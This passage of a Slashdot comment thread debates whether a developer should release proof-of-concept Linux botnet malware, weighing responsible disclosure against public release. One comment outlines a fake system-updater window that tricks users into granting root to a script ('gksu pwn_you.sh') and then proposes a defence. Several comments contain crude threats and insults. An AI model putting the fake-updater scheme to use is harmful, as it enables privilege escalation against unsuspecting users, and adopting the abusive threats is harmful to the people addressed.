Another option would be to set up the system on your server but not release the source , you could demonstrate the weaknesses of * nix without putting anybody in any real danger .</tokentext>
<sentencetext>As you said in your own post, compromising a linux box isn't impossible.
The code you have isn't all that revolutionary, it's just a demo.
Anybody with actual malicious intent would likely know how to make a program like this themselves.
Another option would be to set up the system on your server but not release the source, you could demonstrate the weaknesses of *nix without putting anybody in any real danger.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278970</id>
	<title>Why not send it to Linus?</title>
	<author>Anonymous</author>
	<datestamp>1259598840000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext>SERIOUSLY!!!  Putting it in the wild will HURT the Linux community, in many, many ways.  Sending it to people who are close to the design of the OS, who may be able to do something about it will HELP the community.  As for your ethics question, let me answer it with a question:  When you leave your house for work, school, the grocer, etc., do you wear full body armor, and carry a gun?  How would you feel if someone got tired of his country-men, (including you,) feeling so complacent and secure that you will walk blithely down the street without full body armor, a gas-mask, guns and ammo, that he decides to "show you all the error of your ways" by randomly sniping/gassing/tossing-grenades-at you, your family, and your friends?  Wouldn't like it much, would you? <p> What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc.  Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself. ~Hal</p></htmltext>
<tokenext>SERIOUSLY ! ! !
Putting it in the wild will HURT the Linux community , in many , many ways .
Sending it to people who are close to the design of the OS , who may be able to do something about it will HELP the community .
As for your ethics question , let me answer it with a question : When you leave your house for work , school , the grocer , etc. , do you wear full body armor , and carry a gun ?
How would you feel if someone got tired of his country-men , ( including you , ) feeling so complacent and secure that you will walk blithely down the street without full body armor , a gas-mask , guns and ammo , that he decides to " show you all the error of your ways " by randomly sniping/gassing/tossing-grenades-at you , your family , and your friends ?
Would n't like it much , would you ?
What you are contemplating doing is roughly , the digital-electronic equivalent of supplying criminals with maps of wealthy communities , marked with what areas are and are not guarded , where valuables are kept , etc .
Do n't think that simply because you did n't write a truly malicious payload , that by letting others use a tool you can and should reasonably know will be used for evil purposes you do n't share in the culpability , ethically if not legally , even if you do n't pull the trigger yourself .
~ Hal</tokentext>
<sentencetext>SERIOUSLY!!!
Putting it in the wild will HURT the Linux community, in many, many ways.
Sending it to people who are close to the design of the OS, who may be able to do something about it will HELP the community.
As for your ethics question, let me answer it with a question:  When you leave your house for work, school, the grocer, etc., do you wear full body armor, and carry a gun?
How would you feel if someone got tired of his country-men, (including you,) feeling so complacent and secure that you will walk blithely down the street without full body armor, a gas-mask, guns and ammo, that he decides to "show you all the error of your ways" by randomly sniping/gassing/tossing-grenades-at you, your family, and your friends?
Wouldn't like it much, would you?
What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc.
Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself.
~Hal</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283572</id>
	<title>Nobody reads a manual..</title>
	<author>Anonymous</author>
	<datestamp>1259684700000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Write a 100-page technical description.</p><p>If someone reads it to exploit it..<nobr> <wbr></nobr>.. they probably would even without your help.</p></htmltext>
<tokenext>Write a 100-page technical description.If someone reads it to exploit it.. .. they probably would even without your help .</tokentext>
<sentencetext>Write a 100-page technical description.If someone reads it to exploit it.. .. they probably would even without your help.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291936</id>
	<title>Private release</title>
	<author>Anonymous</author>
	<datestamp>1259676420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Contact the security arm of all major distributions as well as senior Linux devs. Be willing to submit the code to those specified vendors so they can start to take action. Then write it up but do not release any code (work with the vendors to identify when appropriate advisories will be released).</p><p>Someone else will take your work (paper) and develop something evil, so giving vendors time to respond prior to release is important.</p><p>Even your posting on slashdot will now have evil doings scrambling to figure out what you did for their own purposes.</p><p>Great work! This has a potential to steup up the security stance of the standard Linux systems as released by vendors.</p><p>Good luck.</p></htmltext>
<tokenext>Contact the security arm of all major distributions as well as senior Linux devs .
Be willing to submit the code to those specified vendors so they can start to take action .
Then write it up but do not release any code ( work with the vendors to identify when appropriate advisories will be released ) .Someone else will take your work ( paper ) and develop something evil , so giving vendors time to respond prior to release is important.Even your posting on slashdot will now have evil doings scrambling to figure out what you did for their own purposes.Great work !
This has a potential to steup up the security stance of the standard Linux systems as released by vendors.Good luck .</tokentext>
<sentencetext>Contact the security arm of all major distributions as well as senior Linux devs.
Be willing to submit the code to those specified vendors so they can start to take action.
Then write it up but do not release any code (work with the vendors to identify when appropriate advisories will be released).Someone else will take your work (paper) and develop something evil, so giving vendors time to respond prior to release is important.Even your posting on slashdot will now have evil doings scrambling to figure out what you did for their own purposes.Great work!
This has a potential to steup up the security stance of the standard Linux systems as released by vendors.Good luck.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810</id>
	<title>It does harm!!!!</title>
	<author>Anonymous</author>
	<datestamp>1259597580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Look at it this way, if you log into your computer only to find that the computer has mysteriously joined Boinc what would you do?  You would try to find the source, but when in doubt, probably wipe the partition and re-install.  If you worked for a large corporation you might have to file all kinds of reports, alert all kinds of security personnel etc.  That 'harmless' prank could cost thousands of dollars.</p><p>Lets put it another way.  Even if I left my house door wide open, opened all the windows etc.  It still does not give you the right to come in and f*ck with my house.</p><p>I reserve the right to track down anyone that even attempts to break into my house or my computer and kick their ass.  I don't give a rats @$$ that you don't like Linux fan boys or whatever the reason for 'why' you did it.</p><p>kdawson - you need to get punched a few times for even rationalizing that it just might be O.K.</p></htmltext>
<tokenext>Look at it this way , if you log into your computer only to find that the computer has mysteriously joined Boinc what would you do ?
You would try to find the source , but when in doubt , probably wipe the partition and re-install .
If you worked for a large corporation you might have to file all kinds of reports , alert all kinds of security personnel etc .
That 'harmless ' prank could cost thousands of dollars.Lets put it another way .
Even if I left my house door wide open , opened all the windows etc .
It still does not give you the right to come in and f * ck with my house.I reserve the right to track down anyone that even attempts to break into my house or my computer and kick their ass .
I do n't give a rats @ $ $ that you do n't like Linux fan boys or whatever the reason for 'why ' you did it.kdawson - you need to get punched a few times for even rationalizing that it just might be O.K .</tokentext>
<sentencetext>Look at it this way, if you log into your computer only to find that the computer has mysteriously joined Boinc what would you do?
You would try to find the source, but when in doubt, probably wipe the partition and re-install.
If you worked for a large corporation you might have to file all kinds of reports, alert all kinds of security personnel etc.
That 'harmless' prank could cost thousands of dollars.Lets put it another way.
Even if I left my house door wide open, opened all the windows etc.
It still does not give you the right to come in and f*ck with my house.I reserve the right to track down anyone that even attempts to break into my house or my computer and kick their ass.
I don't give a rats @$$ that you don't like Linux fan boys or whatever the reason for 'why' you did it.kdawson - you need to get punched a few times for even rationalizing that it just might be O.K.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281042</id>
	<title>FANUM</title>
	<author>Anonymous</author>
	<datestamp>1259664900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>It amuses me how many of these posts are obviously written by people who have never run Linux or have no understanding of the differences between windows (30 year old hack job of unmanaged code), and Linux. So I dare everyone to read this. If you really believe that Linux is just as insecure as window, read this entire article (front to back), then go apologize to everyone in your life you have misinformed over the last X number of years.</p><p>http://www.theregister.co.uk/2004/10/22/security\_report\_windows\_vs\_linux/</p></htmltext>
<tokenext>It amuses me how many of these posts are obviously written by people who have never run Linux or have no understanding of the differences between windows ( 30 year old hack job of unmanaged code ) , and Linux .
So I dare everyone to read this .
If you really believe that Linux is just as insecure as window , read this entire article ( front to back ) , then go apologize to everyone in your life you have misinformed over the last X number of years.http : //www.theregister.co.uk/2004/10/22/security \ _report \ _windows \ _vs \ _linux/</tokentext>
<sentencetext>It amuses me how many of these posts are obviously written by people who have never run Linux or have no understanding of the differences between windows (30 year old hack job of unmanaged code), and Linux.
So I dare everyone to read this.
If you really believe that Linux is just as insecure as window, read this entire article (front to back), then go apologize to everyone in your life you have misinformed over the last X number of years.http://www.theregister.co.uk/2004/10/22/security\_report\_windows\_vs\_linux/</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278632</id>
	<title>make it F/OSS</title>
	<author>Anonymous</author>
	<datestamp>1259596140000</datestamp>
	<modclass>Troll</modclass>
	<modscore>0</modscore>
	<htmltext><p>put it on sourceforge.  maybe let 4chan know.  it's all good.</p></htmltext>
<tokenext>put it on sourceforge .
maybe let 4chan know .
it 's all good .</tokentext>
<sentencetext>put it on sourceforge.
maybe let 4chan know.
it's all good.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279452</id>
	<title>No</title>
	<author>Anonymous</author>
	<datestamp>1259603460000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Do not release it. Make people do their own damn work.</p></htmltext>
<tokenext>Do not release it .
Make people do their own damn work .</tokentext>
<sentencetext>Do not release it.
Make people do their own damn work.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30302084</id>
	<title>mahahaha!</title>
	<author>Anonymous</author>
	<datestamp>1259574420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>i run Debian GNU/Linux with stumpwm and sawfish as main "desktops". there is no sudo on my box and just one sources.list entry of an official secondary mirror in my hometown (i know the admin personally). i download just from the main repository (vrms gives null results i.e. i get just trusted high quality software). i got iptables, ebtables, rkhunter, tiger , chkrootkit, unhide, ossec-rootcheck, tripwire, custom hosts file, hosts.allow, all unnessecary tty's disabled, just one port open for lsh (which only allows gpg authenticated connections into a underprivileged dummy account), my main browser is w3m via surfraw, got my own dns server, web proxy, the only udp port open is the one for dhcp and my router got it's own firewall, bla bla bla bla bla... you think you can put something in my bashrc? o.k. try it. if you succeed i send you back a nice present! but don't cry when your windoof box breaks you little wannabe script kiddy! i guess you couldn't even crack the bashrc on my HURD system if i gave you an account on it...^\_^</p></htmltext>
<tokenext>i run Debian GNU/Linux with stumpwm and sawfish as main " desktops " .
there is no sudo on my box and just one sources.list entry of an official secondary mirror in my hometown ( i know the admin personally ) .
i download just from the main repository ( vrms gives null results i.e .
i get just trusted high quality software ) .
i got iptables , ebtables , rkhunter , tiger , chkrootkit , unhide , ossec-rootcheck , tripwire , custom hosts file , hosts.allow , all unnessecary tty 's disabled , just one port open for lsh ( which only allows gpg authenticated connections into a underprivileged dummy account ) , my main browser is w3m via surfraw , got my own dns server , web proxy , the only udp port open is the one for dhcp and my router got it 's own firewall , bla bla bla bla bla... you think you can put something in my bashrc ?
o.k. try it .
if you succeed i send you back a nice present !
but do n't cry when your windoof box breaks you little wannabe script kiddy !
i guess you could n't even crack the bashrc on my HURD system if i gave you an account on it... ^ \ _ ^</tokentext>
<sentencetext>i run Debian GNU/Linux with stumpwm and sawfish as main "desktops".
there is no sudo on my box and just one sources.list entry of an official secondary mirror in my hometown (i know the admin personally).
i download just from the main repository (vrms gives null results i.e.
i get just trusted high quality software).
i got iptables, ebtables, rkhunter, tiger , chkrootkit, unhide, ossec-rootcheck, tripwire, custom hosts file, hosts.allow, all unnessecary tty's disabled, just one port open for lsh (which only allows gpg authenticated connections into a underprivileged dummy account), my main browser is w3m via surfraw, got my own dns server, web proxy, the only udp port open is the one for dhcp and my router got it's own firewall, bla bla bla bla bla... you think you can put something in my bashrc?
o.k. try it.
if you succeed i send you back a nice present!
but don't cry when your windoof box breaks you little wannabe script kiddy!
i guess you couldn't even crack the bashrc on my HURD system if i gave you an account on it...^\_^</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284430</id>
	<title>esx</title>
	<author>Anonymous</author>
	<datestamp>1259688360000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>lets all justn have seccxx</p></htmltext>
<tokenext>lets all justn have seccxx</tokentext>
<sentencetext>lets all justn have seccxx</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297222</id>
	<title>Re:Indeed Differences</title>
	<author>Anonymous</author>
	<datestamp>1259596380000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Access rights:<br>in windows everyone, including the cat running across the keyboard have full admin privileges.<br>in linux, mac os X and other unices, users (and cats) have only user-level access and must switch to some other access account to gain further privilege.</p><p>This is not entirely true of windows but what is true is Microsofts stupidity and having the user account created during setup defaulting to this state.  On both systems it is simply a lake of the user careing to secure there system</p></htmltext>
<tokenext>Access rights : in windows everyone , including the cat running across the keyboard have full admin privileges.in linux , mac os X and other unices , users ( and cats ) have only user-level access and must switch to some other access account to gain further privilege.This is not entirely true of windows but what is true is Microsofts stupidity and having the user account created during setup defaulting to this state .
On both systems it is simply a lake of the user careing to secure there system</tokentext>
<sentencetext>Access rights:in windows everyone, including the cat running across the keyboard have full admin privileges.in linux, mac os X and other unices, users (and cats) have only user-level access and must switch to some other access account to gain further privilege.This is not entirely true of windows but what is true is Microsofts stupidity and having the user account created during setup defaulting to this state.
On both systems it is simply a lake of the user careing to secure there system</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30290712</id>
	<title>you will pay</title>
	<author>Anonymous</author>
	<datestamp>1259670180000</datestamp>
	<modclass>Troll</modclass>
	<modscore>-1</modscore>
	<htmltext><p>I really hope someone finds you and stuffs your dick so far up your nose you give yourself a blow job before suffocting</p></htmltext>
<tokenext>I really hope someone finds you and stuffs your dick so far up your nose you give yourself a blow job before suffocting</tokentext>
<sentencetext>I really hope someone finds you and stuffs your dick so far up your nose you give yourself a blow job before suffocting</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281928</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259674860000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The crucial difference, though, again comes from being open source. In Windows world, the quick&amp;dirty fixes remain needed and therefore used for years. In open source world, the fixes for very popular things get integrated into the distributions fast. Especially with Ubuntu. The cases when this is not possible because of laws/copyrights, it's more hairy but even so those tend to get collected together into packages that can do a lot of those fixes. I think Linux Mint is one example of that, actually.</p></htmltext>
<tokenext>The crucial difference , though , again comes from being open source .
In Windows world , the quick&amp;dirty fixes remain needed and therefore used for years .
In open source world , the fixes for very popular things get integrated into the distributions fast .
Especially with Ubuntu .
The cases when this is not possible because of laws/copyrights , it 's more hairy but even so those tend to get collected together into packages that can do a lot of those fixes .
I think Linux Mint is one example of that , actually .</tokentext>
<sentencetext>The crucial difference, though, again comes from being open source.
In Windows world, the quick&amp;dirty fixes remain needed and therefore used for years.
In open source world, the fixes for very popular things get integrated into the distributions fast.
Especially with Ubuntu.
The cases when this is not possible because of laws/copyrights, it's more hairy but even so those tend to get collected together into packages that can do a lot of those fixes.
I think Linux Mint is one example of that, actually.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280436</id>
	<title>Non-MALicious MALware?</title>
	<author>BitZtream</author>
	<datestamp>1259658300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Really?</p><p>Non-<strong>MAL</strong>icious <strong>MAL</strong>ware?</p><p>Its awesome to see non-malicious malicious software for Linux.</p><p>Way to go the kdawson, your reading comprehension skills are just freaking top notch.</p></htmltext>
<tokenext>Really ? Non-MALicious MALware ? Its awesome to see non-malicious malicious software for Linux.Way to go the kdawson , your reading comprehension skills are just freaking top notch .</tokentext>
<sentencetext>Really?Non-MALicious MALware?Its awesome to see non-malicious malicious software for Linux.Way to go the kdawson, your reading comprehension skills are just freaking top notch.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</id>
	<title>Malware and Worms in GNU/Linux and *BSD</title>
	<author>Anonymous</author>
	<datestamp>1259598540000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p><div class="quote"><p>Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client</p></div><p>It would be nice to see the code. As it stands, I am surprised that this "news" made it this far, with no links of any kind.

</p><p>No one credible claims that malware is impossible in GNU/Linux or *BSD. In fact, since UNIX is a much more robust
networking OS, maintaining a botnet should be helluva lot easier than on Windows. What we have with a free OS, though,
is something that proprietary OS users will never have: a complete and total control over our security policy and every
other aspect of our software environment. When and if a vector is identified, our security policy will promptly change to
nip it in the bud.

</p><p> <b>A Speculative Example</b>

</p><p>Lately I've been thinking about one major vector: the human-assisted privilege escalation. Take the latest Ubuntu
and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking
that it is the automatic updater. Lacking in both expertise and time, I am not going to do a proof of concept, but
how hard can it be? You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would
find legit, with version number irrelevant to their day-to-day life (e.g. binutils), wait for the user to click [Install Updates],
and then "gksu pwn\_you.sh". The user will enter the password, and your work is done. Then, of course, you still need to draw
some progress bars to lull the user into believing that an update is going on, but that's all just an icing on the cake.

</p><p>If anyone can see why this won't work, I would like to hear it.

</p><p>Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the
default behavior is to <b>notify only</b>. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you
EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.

</p><p>This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed
from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason,
you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.</p></div>
	</htmltext>
<tokenext>Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet clientIt would be nice to see the code .
As it stands , I am surprised that this " news " made it this far , with no links of any kind .
No one credible claims that malware is impossible in GNU/Linux or * BSD .
In fact , since UNIX is a much more robust networking OS , maintaining a botnet should be helluva lot easier than on Windows .
What we have with a free OS , though , is something that proprietary OS users will never have : a complete and total control over our security policy and every other aspect of our software environment .
When and if a vector is identified , our security policy will promptly change to nip it in the bud .
A Speculative Example Lately I 've been thinking about one major vector : the human-assisted privilege escalation .
Take the latest Ubuntu and imagine a piece of software which runs with user privileges and does the following : it tricks the user into thinking that it is the automatic updater .
Lacking in both expertise and time , I am not going to do a proof of concept , but how hard can it be ?
You just need to draw a window named " Update Manager " using the standard Gnome API , list a few bogus updates anyone would find legit , with version number irrelevant to their day-to-day life ( e.g .
binutils ) , wait for the user to click [ Install Updates ] , and then " gksu pwn \ _you.sh " .
The user will enter the password , and your work is done .
Then , of course , you still need to draw some progress bars to lull the user into believing that an update is going on , but that 's all just an icing on the cake .
If anyone can see why this wo n't work , I would like to hear it .
Looks scary , right ?
Wrong. Because the solution is as simple as changing the default policy .
Make it so that the default behavior is to notify only .
On every system update the user should be told : " Go start the updater via the system menu .
By the way , if you EVER see an " updater " you did n't start yourself , you are being pwned .
" Make sure that the system menu is strictly read-only , and even the dimmest user will be safe .
This wo n't be implemented in Windows .
Why ? I really can not guess why Microsoft 's security policy seems to be designed from ground up to fuck the user , but it is .
The usual excuse seems to be : " it 's easy to use " .
But whatever is the reason , you just can not make a proprietary platform secure because you can not pop the hood open .
With a free OS , you can .</tokentext>
<sentencetext>Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet clientIt would be nice to see the code.
As it stands, I am surprised that this "news" made it this far, with no links of any kind.
No one credible claims that malware is impossible in GNU/Linux or *BSD.
In fact, since UNIX is a much more robust
networking OS, maintaining a botnet should be helluva lot easier than on Windows.
What we have with a free OS, though,
is something that proprietary OS users will never have: a complete and total control over our security policy and every
other aspect of our software environment.
When and if a vector is identified, our security policy will promptly change to
nip it in the bud.
A Speculative Example

Lately I've been thinking about one major vector: the human-assisted privilege escalation.
Take the latest Ubuntu
and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking
that it is the automatic updater.
Lacking in both expertise and time, I am not going to do a proof of concept, but
how hard can it be?
You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would
find legit, with version number irrelevant to their day-to-day life (e.g.
binutils), wait for the user to click [Install Updates],
and then "gksu pwn\_you.sh".
The user will enter the password, and your work is done.
Then, of course, you still need to draw
some progress bars to lull the user into believing that an update is going on, but that's all just an icing on the cake.
If anyone can see why this won't work, I would like to hear it.
Looks scary, right?
Wrong. Because the solution is as simple as changing the default policy.
Make it so that the
default behavior is to notify only.
On every system update the user should be told: "Go start the updater via the system menu.
By the way, if you
EVER see an "updater" you didn't start yourself, you are being pwned.
" Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This won't be implemented in Windows.
Why? I really cannot guess why Microsoft's security policy seems to be designed
from ground up to fuck the user, but it is.
The usual excuse seems to be: "it's easy to use".
But whatever is the reason,
you just cannot make a proprietary platform secure because you cannot pop the hood open.
With a free OS, you can.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281168</id>
	<title>Stupid</title>
	<author>Anonymous</author>
	<datestamp>1259666040000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>So this idiot thinks his "virus" or whatever will make a differenece in the world</p></htmltext>
<tokenext>So this idiot thinks his " virus " or whatever will make a differenece in the world</tokentext>
<sentencetext>So this idiot thinks his "virus" or whatever will make a differenece in the world</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100</id>
	<title>Tricking people into doing stupid things.</title>
	<author>bmo</author>
	<datestamp>1259599980000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>&gt;mindless execution of unverified downloads</p><p>There is no cure for stupid on any platform.</p><p>People will install purple gorillas and cd-drive-cupholders.  This is not new.</p><p>But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: <a href="http://slashdot.org/comments.pl?sid=3291&amp;cid=1395315" title="slashdot.org">http://slashdot.org/comments.pl?sid=3291&amp;cid=1395315</a> [slashdot.org]</p><p>This situation may not last (c.f., sudo silliness on fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.</p><p>--<br>BMO</p></htmltext>
<tokenext>&gt; mindless execution of unverified downloadsThere is no cure for stupid on any platform.People will install purple gorillas and cd-drive-cupholders .
This is not new.But beyond user stupidity , there are reasons why propagation of badware on Linux and Unix sucks , and I suggest that people read Tom 's excellent rant here : http : //slashdot.org/comments.pl ? sid = 3291&amp;cid = 1395315 [ slashdot.org ] This situation may not last ( c.f. , sudo silliness on fedora ) , but unless you can do a miracle of social engineering , treachery , and underhandedness and get your badware included in the main repositories as source ( which repo maintainers and end users use to build packages ) , you 're not going to get very far in the * nix world.--BMO</tokentext>
<sentencetext>&gt;mindless execution of unverified downloadsThere is no cure for stupid on any platform.People will install purple gorillas and cd-drive-cupholders.
This is not new.But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: http://slashdot.org/comments.pl?sid=3291&amp;cid=1395315 [slashdot.org]This situation may not last (c.f., sudo silliness on fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.--BMO</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279562</id>
	<title>ask yourself this question</title>
	<author>Anonymous</author>
	<datestamp>1259604540000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext>Would it be different if it was Windows malware?  The fact that it is linux malware is irrelevant.  Your software is doing the same thing (installing unauthorized code onto people's machines).
<p>
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
</p><p>
This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a<nobr> <wbr></nobr>.c file and running gcc.</p></htmltext>
<tokenext>Would it be different if it was Windows malware ?
The fact that it is linux malware is irrelevant .
Your software is doing the same thing ( installing unauthorized code onto people 's machines ) .
I say release the ideas , or at least document the concepts with pseudocode so that the average skript kiddie ca n't just download and modify - they 'd at least need to spend the time implementing it in some language .
This way , people qualified to fix the problem can review your proof of concept and fix the problem , but you 're limiting the exposure to the average bored 15 year old who 's skillset does n't extend too far beyond downloading a .c file and running gcc .</tokentext>
<sentencetext>Would it be different if it was Windows malware?
The fact that it is linux malware is irrelevant.
Your software is doing the same thing (installing unauthorized code onto people's machines).
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a .c file and running gcc.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278666</id>
	<title>bad idea</title>
	<author>Anonymous</author>
	<datestamp>1259596260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>its not that "linux is so secure" that makes it more secure to run.</p><p>its that linux hasn't become popular amoung the malware and virus writers so we enjoy the benefit of less or no virus/malware.</p><p>so you want to make malware and virus writing popular in linux too. ugh...</p></htmltext>
<tokenext>its not that " linux is so secure " that makes it more secure to run.its that linux has n't become popular amoung the malware and virus writers so we enjoy the benefit of less or no virus/malware.so you want to make malware and virus writing popular in linux too .
ugh.. .</tokentext>
<sentencetext>its not that "linux is so secure" that makes it more secure to run.its that linux hasn't become popular amoung the malware and virus writers so we enjoy the benefit of less or no virus/malware.so you want to make malware and virus writing popular in linux too.
ugh...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280284</id>
	<title>Re:It does harm!!!!</title>
	<author>Anonymous</author>
	<datestamp>1259700180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>However, if they walk in a door you opened, they haven't "broken in".</p></div><p>Actually... they have. "Breaking and entering" apparently doesn't require any actual breaking. Of course, if you explicitly opened the door and held it for them, that's implied permission to enter. But if they just left their door open and you wandered in, they can be charged with breaking and entering.</p></div>
	</htmltext>
<tokenext>However , if they walk in a door you opened , they have n't " broken in " .Actually... they have .
" Breaking and entering " apparently does n't require any actual breaking .
Of course , if you explicitly opened the door and held it for them , that 's implied permission to enter .
But if they just left their door open and you wandered in , they can be charged with breaking and entering .</tokentext>
<sentencetext>However, if they walk in a door you opened, they haven't "broken in".Actually... they have.
"Breaking and entering" apparently doesn't require any actual breaking.
Of course, if you explicitly opened the door and held it for them, that's implied permission to enter.
But if they just left their door open and you wandered in, they can be charged with breaking and entering.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279304</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279960</id>
	<title>My Two Cents</title>
	<author>Anonymous</author>
	<datestamp>1259608980000</datestamp>
	<modclass>Flamebait</modclass>
	<modscore>-1</modscore>
	<htmltext><p>I use linux on a day to day basis for the last 2 years or so, mainly because I'm sick of people understanding howto use my computer, anyone I know takes one look at the desktop, calls me a nerd, and keeps walking, problems solved. And also because viruses/malware are way less common on a *nix system because the people that write those sort of programs to steal identities, write them to steal from the masses, why bother writing a virus that \_might\_ effect a few ubuntu users when theres a shit ton of stupid windows users. If your going to sneak attack for greed, attack a mass, not a cult operating system.</p></htmltext>
<tokenext>I use linux on a day to day basis for the last 2 years or so , mainly because I 'm sick of people understanding howto use my computer , anyone I know takes one look at the desktop , calls me a nerd , and keeps walking , problems solved .
And also because viruses/malware are way less common on a * nix system because the people that write those sort of programs to steal identities , write them to steal from the masses , why bother writing a virus that \ _might \ _ effect a few ubuntu users when theres a shit ton of stupid windows users .
If your going to sneak attack for greed , attack a mass , not a cult operating system .</tokentext>
<sentencetext>I use linux on a day to day basis for the last 2 years or so, mainly because I'm sick of people understanding howto use my computer, anyone I know takes one look at the desktop, calls me a nerd, and keeps walking, problems solved.
